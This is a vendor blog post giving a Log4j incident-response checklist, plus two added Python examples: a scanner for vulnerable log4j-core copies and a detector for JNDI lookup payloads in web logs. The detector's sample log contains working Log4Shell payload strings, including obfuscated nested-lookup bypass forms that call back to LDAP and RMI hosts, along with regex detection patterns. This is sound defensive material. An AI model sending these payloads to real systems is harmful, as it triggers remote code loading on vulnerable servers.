{"id":265,"date":"2021-12-17T23:29:00","date_gmt":"2021-12-17T23:29:00","guid":{"rendered":"https:\/\/www.cycognito.com\/blog\/?p=265"},"modified":"2024-01-22T08:54:33","modified_gmt":"2024-01-22T16:54:33","slug":"setup-your-log4j-response-plan","status":"publish","type":"post","link":"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/","title":{"rendered":"Set Up Your Log4J Response Plan"},"content":{"rendered":"\n<p>There is no \u201cone size fits all\u201d solution to the Apache Log4j issues yet, so at CyCognito we have implemented two testing modules (one passive, one active). We have also performed an internal assessment of our own exposure to these vulnerabilities to protect our customers\u2019 data.<\/p>\n\n\n\n<p>Based on our experience responding to these issues, advice from expert CISOs, and our community of customers, here are the steps of a simplified response plan you can use today and for future outbreaks. For a much more detailed response plan we recommend the&nbsp;<a href=\"https:\/\/www.cisa.gov\/uscert\/apache-log4j-vulnerability-guidance\">CISA Apache Log4j Vulnerability Guidance<\/a>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"627\" src=\"https:\/\/www.cycognito.com\/blog\/wp-content\/uploads\/Log4j-Checklist-1.jpg\" alt=\"Log4j response plan checklist\" class=\"wp-image-266\" srcset=\"https:\/\/www.cycognito.com\/blog\/wp-content\/uploads\/Log4j-Checklist-1.jpg 1200w, https:\/\/www.cycognito.com\/blog\/wp-content\/uploads\/Log4j-Checklist-1-512x268.jpg 512w, https:\/\/www.cycognito.com\/blog\/wp-content\/uploads\/Log4j-Checklist-1-768x401.jpg 768w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/><\/figure>\n\n\n\n<p>Our security research and analyst teams recommend performing the following immediately:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>SELF-ASSESSMENT: If you are a software or technology services vendor, your first priority should be ensuring 
your customers\u2019 data is secure.\n<ul class=\"wp-block-list\">\n<li>Investigate the software bill of materials (SBOM) of any software you provide, including transitive dependencies: Log4j is usually pulled in indirectly, and it is often bundled inside application archives rather than shipped as a separate file a package manager would know about.<\/li>\n\n\n\n<li>Check with your\u00a0<a href=\"\/blog\/accellion-supply-chain-attack\/\">third party partners<\/a>\u00a0that they are not affected in a way that affects your software or service.<\/li>\n\n\n\n<li><a href=\"https:\/\/www.splunk.com\/en_us\/blog\/security\/log-jammin-log4j-2-rce.html\">Monitor all logs<\/a>,\u00a0<a href=\"\/blog\/log4j-risky-business\/\">services<\/a>, and traces as if an incident did occur until you can be confident one did not. Look for JNDI lookup strings in every field an attacker controls (User-Agent, URL path and query, other headers, form fields), and remember that attackers obfuscate the payload with nested lookups, so a search for the literal text alone is not enough.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>TRACE: Investigate your external attack surface first (<a href=\"\/platform\/\">with an external attack surface management platform like CyCognito<\/a>) and internal attack surface second to understand if and where you are running vulnerable Log4j 2 versions or software that bundles them.\u00a0<a href=\"\/blog\/log4j-risky-business\/\">Here\u2019s a list of software we know about so far<\/a>.<\/li>\n\n\n\n<li>PRIORITIZE: Start with the vulnerable assets in your external attack surface. Exploitation of an internet-facing host gives an attacker the initial access that turns into a much wider breach and a much larger cleanup.<\/li>\n\n\n\n<li>CURE: Upgrade the Log4j copies you know about in your external attack surface to a fixed release (2.17.1 or later on Java 8; check the Apache Log4j security page for the current minimums on each branch), and patch software that bundles Log4j in your internal attack surface as vendor patches become available. Removing the JndiLookup class from the jar is the documented fallback where an upgrade is not yet possible.<\/li>\n\n\n\n<li>VACCINATE:&nbsp;<a href=\"https:\/\/github.com\/Cybereason\/Logout4Shell\">Inoculate any log4j applications<\/a>&nbsp;(use caution and read the details; this is an in-memory stopgap that disables the lookup in the running process, not a replacement for patching, so confirm the host\u2019s state again after any restart)<\/li>\n\n\n\n<li>TEST: Do ongoing and continuous testing of suspected assets for the vulnerability, including custom-built apps and container images. Plan for this process to continue for years as this vulnerability is in a ubiquitous open source technology. 
New exploits will be disclosed, and old images (golden VM images, container base images, backups) may be brought back online with the vulnerable library still inside.<\/li>\n\n\n\n<li>QUARANTINE: If you find systems that can\u2019t be patched or vaccinated, consider taking them offline or putting them behind a firewall, and continue monitoring affected assets for signs of compromise. Restrict outbound traffic from these hosts as well as inbound: exploitation depends on the victim making an outbound connection to the attacker\u2019s server (typically LDAP or RMI, with DNS used to confirm the bug is reachable), so blocking unexpected egress from application servers breaks the attack chain and makes callback attempts visible in firewall logs.<\/li>\n\n\n\n<li>MASK: Another way to protect systems that can\u2019t be patched or vaccinated is to use compensating controls like web application firewalls (WAF) and eXtended Detection and Response (XDR) that \u201cvirtually patch\u201d vulnerable hosts until other mitigations can be implemented. Treat these as partial: signature-based WAF rules for this issue were bypassed within days by obfuscated payloads, so pair them with egress filtering and keep patching.<\/li>\n\n\n\n<li>COMMUNICATE: Risk teams need to be aware of current status; business and technical risk managers need up-to-date information on\u00a0<a href=\"\/blog\/where-the-heck-do-i-start-or-why-we-created-remediation-planner\/\">remediation plans and progress<\/a>. Think about what to communicate to the CISO, Chief Risk Officer and business VPs responsible for profit and loss. Daily email briefings can reduce the need for redundant one-on-one discussions.\n<ul class=\"wp-block-list\">\n<li>PEOPLE: Keep in mind that while this looks like a technology crisis it\u2019s also a people problem. Make sure your people are informed about what to do, who to communicate with, and that they are expected and encouraged to take breaks, especially with the holidays approaching. 
Gratitude and appreciation for their efforts will go a long way!<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>DISCLOSURE: Whether affected or not, your management team may need to make a statement if you are a provider of software or services.\n<ul class=\"wp-block-list\">\n<li>If you are affected,\u00a0<a href=\"\/blog\/5-parts-of-good-breach-disclosure\/\">disclose<\/a>\u00a0to your customers and your partners in a rapid and public fashion so they can take precautions.<\/li>\n\n\n\n<li>If you are not affected, communicate your status and the steps taken to confirm you were not affected.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>ASSUME BREACH: Log4j is an evolving situation and we do not yet understand all of the Tactics, Techniques and Procedures being used as we speak. Perform impact-mitigating measures such as the following:\n<ul class=\"wp-block-list\">\n<li>Rotate secrets that were reachable from affected systems, such as passwords, certificates, API tokens and cloud credentials. A successful exploit runs with the application\u2019s privileges and can read anything the process could, including environment variables and configuration files.<\/li>\n\n\n\n<li>Treat any later use of the old, pre-rotation credentials as an Indicator of Compromise (IOC), and watch North-South network flows from affected hosts for the outbound LDAP, RMI and DNS callbacks that exploitation produces.<\/li>\n\n\n\n<li>Continue to update SIEM solutions with evolving IOCs and run them against historic logs, including the days before the public disclosure, since early exploitation was observed before the issue was widely known.<\/li>\n\n\n\n<li>Power cycle or redeploy affected resources to clear working memory, regardless of initial investigation conclusions. If you need evidence, capture a memory image and disk snapshot first: a reboot destroys the in-memory artifacts (injected classes, attacker threads, open connections) that an investigation depends on.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<p>If you\u2019d like to connect with a CyCognito representative to see how we can help, please\u00a0<a href=\"\/contact\/\">contact us<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Based on our experience responding to these issues, advice from expert CISOs, and our community of customers, here are steps for a simplified response plan you can use today and for future 
outbreaks.<\/p>\n","protected":false},"author":15,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[79],"class_list":["post-265","post","type-post","status-publish","format-standard","hentry","category-research","tag-log4j"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v24.7 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Set Up Your Log4J Response Plan | CyCognito Blog<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Set Up Your Log4J Response Plan | CyCognito Blog\" \/>\n<meta property=\"og:description\" content=\"Based on our experience responding to these issues, advice from expert CISOs, and our community of customers here are steps for a simplified response plan you can use today and for future outbreaks.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/\" \/>\n<meta property=\"og:site_name\" content=\"CyCognito Blog\" \/>\n<meta property=\"article:published_time\" content=\"2021-12-17T23:29:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-01-22T16:54:33+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.cycognito.com\/blog\/wp-content\/uploads\/Log4j-Checklist-1.jpg\" \/>\n<meta name=\"author\" content=\"Jim Wachhaus\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Jim Wachhaus\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/\"},\"author\":{\"name\":\"Jim Wachhaus\",\"@id\":\"https:\/\/www.cycognito.com\/blog\/#\/schema\/person\/26e362ecf750edd0380a7de5746cf8d0\"},\"headline\":\"Set Up Your Log4J Response Plan\",\"datePublished\":\"2021-12-17T23:29:00+00:00\",\"dateModified\":\"2024-01-22T16:54:33+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/\"},\"wordCount\":727,\"publisher\":{\"@id\":\"https:\/\/www.cycognito.com\/blog\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.cycognito.com\/blog\/wp-content\/uploads\/Log4j-Checklist-1.jpg\",\"keywords\":[\"Log4j\"],\"articleSection\":[\"Research\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/\",\"url\":\"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/\",\"name\":\"Set Up Your Log4J Response Plan | CyCognito 
Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.cycognito.com\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.cycognito.com\/blog\/wp-content\/uploads\/Log4j-Checklist-1.jpg\",\"datePublished\":\"2021-12-17T23:29:00+00:00\",\"dateModified\":\"2024-01-22T16:54:33+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/#primaryimage\",\"url\":\"https:\/\/www.cycognito.com\/blog\/wp-content\/uploads\/Log4j-Checklist-1.jpg\",\"contentUrl\":\"https:\/\/www.cycognito.com\/blog\/wp-content\/uploads\/Log4j-Checklist-1.jpg\",\"width\":1200,\"height\":627},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.cycognito.com\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Set Up Your Log4J Response Plan\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.cycognito.com\/blog\/#website\",\"url\":\"https:\/\/www.cycognito.com\/blog\/\",\"name\":\"Cycognito Blog\",\"description\":\"Research, Product News and Latest 
Updates\",\"publisher\":{\"@id\":\"https:\/\/www.cycognito.com\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.cycognito.com\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.cycognito.com\/blog\/#organization\",\"name\":\"Cycognito\",\"url\":\"https:\/\/www.cycognito.com\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.cycognito.com\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.cycognito.com\/blog\/wp-content\/uploads\/logo-1720x550-1.png\",\"contentUrl\":\"https:\/\/www.cycognito.com\/blog\/wp-content\/uploads\/logo-1720x550-1.png\",\"width\":1720,\"height\":550,\"caption\":\"Cycognito\"},\"image\":{\"@id\":\"https:\/\/www.cycognito.com\/blog\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.cycognito.com\/blog\/#\/schema\/person\/26e362ecf750edd0380a7de5746cf8d0\",\"name\":\"Jim Wachhaus\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.cycognito.com\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/79b6bf97cd7168a87f54b0b9f6ce82be?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/79b6bf97cd7168a87f54b0b9f6ce82be?s=96&d=mm&r=g\",\"caption\":\"Jim Wachhaus\"},\"description\":\"Was Director of Technical Product Marketing at CyCognito\",\"url\":\"https:\/\/www.cycognito.com\/blog\/author\/jim-wachhaus\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","_links":{"self":[{"href":"https:\/\/www.cycognito.com\/blog\/wp-json\/wp\/v2\/posts\/265","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.cycognito.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.cycognito.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.cycognito.com\/blog\/wp-json\/wp\/v2\/users\/15"}],"replies":[{"embeddable":true,"href":"https:\/\/www.cycognito.com\/blog\/wp-json\/wp\/v2\/comments?post=265"}],"version-history":[{"count":3,"href":"https:\/\/www.cycognito.com\/blog\/wp-json\/wp\/v2\/posts\/265\/revisions"}],"predecessor-version":[{"id":681,"href":"https:\/\/www.cycognito.com\/blog\/wp-json\/wp\/v2\/posts\/265\/revisions\/681"}],"wp:attachment":[{"href":"https:\/\/www.cycognito.com\/blog\/wp-json\/wp\/v2\/media?parent=265"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.cycognito.com\/blog\/wp-json\/wp\/v2\/categories?post=265"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.cycognito.com\/blog\/wp-json\/wp\/v2\/tags?post=265"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
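The TRACE, CURE and TEST steps in the post above all depend on actually finding every copy of log4j-core on a host, including copies buried inside .war, .ear and fat jars that no package manager ever sees. The following is an added example, not CyCognito's tooling and not code from the post: a Python scanner that walks a directory tree, opens each archive and recurses into the archives it contains, reads the Maven pom.properties that log4j-core ships with, checks whether JndiLookup.class is still present, and classifies each copy. The directory layout, archive names and the fixture it scans are constructed for the demonstration. The version thresholds are the ones published by the Apache Log4j project (2.17.1 for Java 8, 2.12.4 for Java 7 and 2.3.2 for Java 6 as fully fixed; 2.12.2 and 2.3.1 as the first backports of the JNDI fix; 2.15.0, 2.16.0 and 2.17.0 as partial fixes), and the status strings are this example's own wording.

```python
"""Find every copy of Log4j 2 (log4j-core) under a directory, including copies nested
inside .war/.ear/fat jars, and classify each against the published fixed versions.
Added example; the fixture built by build_fixture() is constructed, not a real artifact."""
import io
import os
import re
import tempfile
import zipfile

ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
CORE_POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
CORE_PREFIX = "org/apache/logging/log4j/core/"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); unparseable -> None."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text or "")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)) if m else None


def classify(version, has_jndi_lookup):
    """Status of one log4j-core copy; thresholds follow the Apache Log4j security page."""
    v = parse_version(version)
    if v is None:  # shaded/relocated jars lose pom.properties: version cannot be trusted
        return ("UNKNOWN VERSION: JndiLookup present, verify by hand" if has_jndi_lookup
                else "unknown version, JndiLookup absent")
    if not has_jndi_lookup:
        return "mitigated: JndiLookup.class removed, upgrade when possible"
    java7 = (2, 12, 0) <= v < (2, 13, 0)   # 2.12.x branch for Java 7
    java6 = (2, 3, 0) <= v < (2, 4, 0)     # 2.3.x branch for Java 6
    if v >= (2, 17, 1) or (java7 and v >= (2, 12, 4)) or (java6 and v >= (2, 3, 2)):
        return "fixed"
    if v < (2, 15, 0) and not (java7 and v >= (2, 12, 2)) and not (java6 and v >= (2, 3, 1)):
        return "VULNERABLE: JNDI lookup RCE, patch first"
    return "UPGRADE: partial fix, later Log4j 2 CVEs still apply"


def _pom_version(zf, path):
    for line in zf.read(path).decode("utf-8", "replace").splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def inspect_archive(data, label, findings):
    """Inspect one archive given as bytes; recurse into any archives it contains."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    names = set(zf.namelist())
    if CORE_POM in names or any(n.startswith(CORE_PREFIX) for n in names):
        version = _pom_version(zf, CORE_POM) if CORE_POM in names else None
        has_jndi = JNDI_LOOKUP in names
        findings.append({"path": label, "version": version or "unknown",
                         "jndi_lookup": has_jndi, "status": classify(version, has_jndi)})
    for name in names:  # nested jars inside wars/ears/uber jars
        if name.lower().endswith(ARCHIVE_EXT):
            inspect_archive(zf.read(name), label + "!/" + name, findings)


def scan_tree(root):
    """Walk root and return one finding per log4j-core copy ('outer!/inner' labels)."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, f)
                with open(path, "rb") as fh:
                    inspect_archive(fh.read(), path, findings)
    return findings


def build_fixture(root):
    """Constructed sample tree: a vulnerable 2.14.1 nested in a .war, a fixed 2.17.1 jar,
    and a 2.14.1 jar with JndiLookup.class stripped out (the documented fallback)."""
    def core_jar(version, with_jndi):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr(CORE_POM, "version=%s\n" % version)
            zf.writestr(CORE_PREFIX + "Logger.class", b"")
            if with_jndi:
                zf.writestr(JNDI_LOOKUP, b"")
        return buf.getvalue()
    os.makedirs(os.path.join(root, "app"))
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", core_jar("2.14.1", True))
    for name, data in (("app/shop.war", war.getvalue()),
                       ("log4j-core-2.17.1.jar", core_jar("2.17.1", True)),
                       ("log4j-core-2.14.1-stripped.jar", core_jar("2.14.1", False))):
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(data)


def demo():
    """Scan the constructed fixture; returns {path relative to root: status}."""
    with tempfile.TemporaryDirectory() as root:
        build_fixture(root)
        result = {os.path.relpath(r["path"], root): r["status"] for r in scan_tree(root)}
    for path, status in sorted(result.items()):
        print("%-55s %s" % (status, path))
    return result


if __name__ == "__main__":
    demo()
```

Run scan_tree against the root filesystem of each host, and against mounted VM images, container image layers and backups, to cover the "old images brought back online" case in the TEST step. A copy without pom.properties is reported with an unknown version and has to be checked by hand: from the class list alone the scanner cannot tell a stripped 2.14.1 from a relocated 2.17.1.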
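The "monitor all logs" item under SELF-ASSESSMENT and the caveat under MASK come down to the same fact: the payload is a Log4j lookup string, and Log4j evaluates lookups recursively, so an attacker can send `${${lower:j}ndi:...}` or `${${::-j}${::-n}${::-d}${::-i}:...}` and a filter that only searches for the literal text `${jndi:` misses it. The following is an added example, not code from the post or from the Splunk write-up it links: a Python detector that URL-decodes each field, unwraps nested lookups from the inside out the way Log4j would, and then looks for the surviving `${jndi:` together with the callback scheme and host, which are the IOCs worth feeding to the SIEM and the egress firewall. The log lines are constructed samples in the Apache/nginx combined format using documentation IP ranges, and the lookup forms emulated in `_resolve` (`:-` defaults, lower, upper, date) are an assumption covering the commonly seen bypasses, not a full implementation of Log4j's lookup engine.

```python
"""Detect Log4j JNDI lookup payloads in web server logs, including the nested
lookup forms used to bypass naive ${jndi: filters. Added example; the log lines
in SAMPLE_LOG are constructed samples, not real traffic."""
import re
from urllib.parse import unquote

# Innermost lookup that is not itself a jndi: lookup (those are what must survive unwrapping).
INNER = re.compile(r"\$\{(?!\s*jndi:)([^${}]*)\}", re.IGNORECASE)
JNDI = re.compile(r"\$\{\s*jndi:\s*(?:(\w+)://([^/\s}]+))?", re.IGNORECASE)
# Apache/nginx combined log format: client, request line, status, size, referer, user-agent.
COMBINED = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" \d+ \S+ '
                      r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"')


def _resolve(body):
    """Emulate how Log4j 2 evaluates one innermost ${...} lookup the attacker controls.
    Assumption: only the forms seen in bypass payloads are modelled here."""
    low = body.lower()
    if ":-" in body:                 # ${::-j}, ${env:NOPE:-j}, ${sys:x:-j}: the default value wins
        return body.split(":-", 1)[1]
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    if low.startswith("date:"):      # ${date:'j'}: a SimpleDateFormat quoted literal
        return body[5:].strip("'")
    return ""                        # unknown lookup: drop the wrapper and keep scanning


def normalize(text, max_rounds=50):
    """URL-decode, then unwrap nested lookups from the inside out; returns
    (normalized string, number of lookups unwrapped)."""
    s, unwrapped = unquote(text), 0
    for _ in range(max_rounds):
        s, n = INNER.subn(lambda m: _resolve(m.group(1)), s)
        if n == 0:
            break
        unwrapped += n
    return s, unwrapped


def detect(text):
    """Finding for one field (scheme, callback host, nesting count) or None if clean."""
    s, unwrapped = normalize(text)
    m = JNDI.search(s)
    if not m:
        return None
    return {"scheme": (m.group(1) or "?").lower(), "callback": m.group(2) or "?",
            "nested_lookups": unwrapped, "normalized": s}


def scan_log(lines):
    """Check request line, referer and user-agent of each combined-format line."""
    hits = []
    for line in lines:
        m = COMBINED.match(line)
        if not m:
            continue
        for field in ("req", "ref", "ua"):
            found = detect(m.group(field))
            if found:
                hits.append({"src": m.group("src"), "field": field, **found})
    return hits


# Constructed sample lines; 198.51.100.0/24 and 203.0.113.0/24 are documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:03:14:07 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/95.0"',
    '198.51.100.8 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 1024 "-" '
    '"${jndi:ldap://203.0.113.5:1389/a}"',
    '198.51.100.9 - - [10/Dec/2021:03:14:11 +0000] '
    '"GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.6%2Fx%7D HTTP/1.1" 400 0 "-" "curl/7.79.1"',
    '198.51.100.10 - - [10/Dec/2021:03:14:13 +0000] "GET / HTTP/1.1" 200 1024 "-" '
    '"${${lower:j}ndi:${lower:l}dap://203.0.113.7/z}"',
    '198.51.100.11 - - [10/Dec/2021:03:14:15 +0000] "GET / HTTP/1.1" 200 1024 '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.8:1099/o}" "Mozilla/5.0"',
    '198.51.100.12 - - [10/Dec/2021:03:14:17 +0000] "GET / HTTP/1.1" 200 1024 "-" '
    '"${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//203.0.113.9/a}"',
]

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print("%s %s jndi:%s callback=%s nested=%d" % (
            h["src"], h["field"], h["scheme"], h["callback"], h["nested_lookups"]))
```

Run the same check over every field the application logs from a request (all headers, form fields, JSON bodies), not only the three shown here, and treat any nested lookup in user-controlled input as hostile whether or not `jndi:` survives the unwrap: a legitimate client has no reason to send `${lower:...}` in a User-Agent. The callback host and scheme are what to block at the egress firewall and search for in historic flows.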